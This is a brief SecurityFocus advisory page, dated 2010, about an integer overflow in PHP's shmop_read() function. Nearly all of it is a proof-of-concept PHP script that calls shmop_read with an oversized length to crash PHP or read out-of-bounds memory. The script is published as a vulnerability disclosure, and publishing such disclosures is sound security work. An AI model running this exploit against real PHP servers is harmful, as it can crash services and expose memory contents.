PHP 'shmop_read()' Remote Integer Overflow Vulnerability

The following proof-of-concept code is available:

<?php
$shm_key = ftok(__FILE__, 't');
$shm_id = shmop_open($shm_key, "c", 0644, 100);
$shm_data = shmop_read($shm_id, 1, 2147483647);
//if there is no segmentation fault past this point, we have 2gb of
memory!
echo $shm_data;
?>


 

Privacy Statement
Copyright 2010, SecurityFocus